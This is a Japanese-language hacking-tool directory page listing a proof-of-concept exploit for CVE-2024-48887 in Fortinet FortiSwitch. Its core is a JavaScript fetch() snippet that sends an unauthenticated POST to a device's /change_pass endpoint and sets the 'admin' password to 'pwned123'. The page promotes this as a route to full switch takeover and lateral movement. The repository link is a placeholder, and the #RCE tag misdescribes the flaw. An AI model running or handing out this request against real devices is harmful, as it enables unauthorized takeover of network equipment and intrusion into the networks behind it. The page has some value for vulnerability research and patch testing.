Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — 脆弱なFortinet FortiSwitch GUIエンドポイントにおいて、認可されていないパスワード変更を引き起こす方法を示す軽量なJavaScriptスニペット。 | Kitploit
ツール/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
脆弱性分析エクスプロイト横移動ウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

脆弱なFortinet FortiSwitch GUIエンドポイントにおいて、認可されていないパスワード変更を引き起こす方法を示す軽量なJavaScriptスニペット。

リポジトリを見る
231年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-48887-FortiSwitch-Exploit

🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 軽量なJavaScriptスニペットを公開しました。脆弱性のあるFortinet FortiSwitch GUIエンドポイントで、不正なパスワード変更がどのようにトリガーされるかを示しています。

🛠️ 脆弱性について: 攻撃者は、認証なしで単純なfetch()リクエストを作成し、/change_passエンドポイントのバリアントを直接標的として、パスワード設定を操作できます。

root@kitploit:~
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 影響: スイッチの完全な乗っ取り、横移動の可能性、ネットワークの侵害。

📁 リポジトリ: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ リポジトリにスターをつけて、インフォセク仲間と共有してください!

📢 完全な解説とリアルタイムアラートは @cybersecplayground でフォローしてください

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

ツールをダウンロード